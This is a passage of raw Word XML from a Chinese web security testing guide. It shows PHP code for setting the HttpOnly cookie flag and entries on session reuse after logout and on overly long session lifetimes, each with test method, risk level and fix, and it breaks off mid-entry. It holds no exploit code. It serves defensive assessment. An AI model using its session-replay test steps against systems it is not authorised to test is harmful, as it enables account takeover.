          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的设置如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267F7758"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hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP5.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以上版本已支持</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数的设置，同样也支持全局的</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的设置，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php.ini</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>session.cookie_httponly</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置其值为</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TRUE</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，来开启全局的</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性，当然也支持在代码中来开启：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8494"/>
      </w:tblGrid>
      <w:tr w:rsidR="004F1389" w:rsidRPr="00267BE4" w14:paraId="0FA53392" w14:textId="77777777" w:rsidTr="00DF3F81">
        <w:trPr>
          <w:trHeight w:val="421"/>
        </w:trPr>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A9D9CE"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lt;?php ini_set("session.cookie_httponly", 1); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2715A3A1"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 // or session_set_cookie_params(0, NULL, NULL, NULL, TRUE); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E25150C" w14:textId="043331A2"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 ?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3EEE79CC"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hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作函数</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setcookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数和</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setrawcookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数也专门添加了第</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个参数来做为</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的选项，开启方法为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8494"/>
      </w:tblGrid>
      <w:tr w:rsidR="004F1389" w:rsidRPr="00267BE4" w14:paraId="48A098BB" w14:textId="77777777" w:rsidTr="00DF3F81">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6BC6CD"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setcookie("abc", "test", NULL, NULL, NULL, NULL, TRUE); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29DE1A38" w14:textId="45C9AD27" w:rsidR="004F1389" w:rsidRPr="00267BE4" w:rsidRDefault="004F1389" w:rsidP="00267BE4">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00267BE4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>setrawcookie("abc", "test", NULL, NULL, NULL, NULL, TRUE);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75FBBDC0" w14:textId="77777777" w:rsidR="004F1389" w:rsidRPr="00267BE4" w:rsidRDefault="004F1389" w:rsidP="00267BE4">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78C014D8" w14:textId="1FEC2075" w:rsidR="004F1389" w:rsidRPr="00267BE4" w:rsidRDefault="004F1389" w:rsidP="00267BE4">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP5.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以前版本以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP4</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本的话，则需要通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数来设置：</w:t>
      </w:r>
      <w:r w:rsidRPr="00267BE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8494"/>
      </w:tblGrid>
      <w:tr w:rsidR="004F1389" w:rsidRPr="00267BE4" w14:paraId="0BB5ED21" w14:textId="77777777" w:rsidTr="00DF3F81">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C27958" w14:textId="7688139C"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lt;?php header("Set-Cookie: hidden=value; httpOnly"); ?&gt; </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="634E1DE0" w14:textId="4F1C8954" w:rsidR="004F1389" w:rsidRPr="004F1389" w:rsidRDefault="008446BE" w:rsidP="008446BE">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349CC1D" w14:textId="7C211E9F" w:rsidR="00E4042A" w:rsidRPr="00F757E4" w:rsidRDefault="00E4042A" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc498434534"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话重用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w14:paraId="228FE7D5" w14:textId="7432C1A9" w:rsidR="00E4042A" w:rsidRPr="00AA322C" w:rsidRDefault="00E4042A" w:rsidP="00AA322C">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="007B5555" w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户退出系统后，服务器端</w:t>
      </w:r>
      <w:r w:rsidR="007B5555" w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidR="007B5555" w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未失效，攻击者可利用此</w:t>
      </w:r>
      <w:r w:rsidR="007B5555" w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidR="007B5555" w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>向服务器继续发送服务请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579457BB" w14:textId="663BC542" w:rsidR="00E4042A" w:rsidRPr="00AA322C" w:rsidRDefault="00E4042A" w:rsidP="00AA322C">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00682C51" w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过客户端</w:t>
      </w:r>
      <w:r w:rsidR="00682C51" w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>提供的注销功能</w:t>
      </w:r>
      <w:r w:rsidR="00682C51" w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>退出客户端登录，利用登录时的会话再次向服务器发出操作请求，判断服务器是否返回操作结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDE80EA" w14:textId="224544DE" w:rsidR="00E4042A" w:rsidRPr="00AA322C" w:rsidRDefault="00C24790" w:rsidP="00AA322C">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00E4042A" w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00181818" w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者通过网络嗅探或者钓鱼攻击窃取用户的</w:t>
      </w:r>
      <w:r w:rsidR="00181818" w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidR="00181818" w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息，在用户注销系统后，如服务器端未直接清理此</w:t>
      </w:r>
      <w:r w:rsidR="00181818" w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidR="00181818" w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则攻击者仍可利用窃取到的</w:t>
      </w:r>
      <w:r w:rsidR="00181818" w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidR="00181818" w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功访问系统直到</w:t>
      </w:r>
      <w:r w:rsidR="00181818" w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidR="00181818" w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过期。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790472F0" w14:textId="77777777" w:rsidR="00E4042A" w:rsidRPr="00AA322C" w:rsidRDefault="00E4042A" w:rsidP="00AA322C">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABA4A8A" w14:textId="5AC4A35C" w:rsidR="00E4042A" w:rsidRPr="00AA322C" w:rsidRDefault="00D0411E" w:rsidP="00AA322C">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：关闭浏览器后或退出后返回之前页面会话依然有效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266126F5" w14:textId="77A79535" w:rsidR="0094664F" w:rsidRDefault="00E4042A" w:rsidP="00AA322C">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00983BE9" w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户退出系统后，服务器端应清空此用户的</w:t>
      </w:r>
      <w:r w:rsidR="00983BE9" w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidR="00983BE9" w:rsidRPr="00AA322C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC97B3D" w14:textId="389DBEEC" w:rsidR="008F1DA6" w:rsidRPr="00AA322C" w:rsidRDefault="008F1DA6" w:rsidP="00AA322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5027E6D5" w14:textId="38BC01A3" w:rsidR="00E4042A" w:rsidRPr="00F757E4" w:rsidRDefault="00E4042A" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc498434535"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>会话失效时间过长</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w14:paraId="21251593" w14:textId="7664E772"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="004D75EB" w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用系统的会话失效时间过长。导致服务器性能受损，且由于过长的失效时间会导致可以被多次利用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3151298A" w14:textId="25134CDA"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测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="004C6B9C" w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录目标系统获得会话，几个小时之后再次利用该会话操作目标系统，测试会话是否失效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294ED651" w14:textId="0E1983C0" w:rsidR="00E4042A" w:rsidRPr="00A845D4" w:rsidRDefault="00C24790" w:rsidP="00A845D4">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00E4042A" w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="007F4DB5" w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实施会话保持攻击</w:t>
      </w:r>
      <w:r w:rsidR="007F4DB5" w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>的前提是攻击者已通过网络中间人攻击窃取用户的</w:t>
      </w:r>
      <w:r w:rsidR="007F4DB5" w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>SessionID</w:t>
      </w:r>
      <w:r w:rsidR="007F4DB5" w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并能</w:t>
      </w:r>
      <w:r w:rsidR="007F4DB5" w:rsidRPr="00A845D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>修改用户的</w:t>
      </w:r>
      <w:r w:rsidR="007F4DB5" w:rsidRPr="00A845D4">
        <w:rPr>
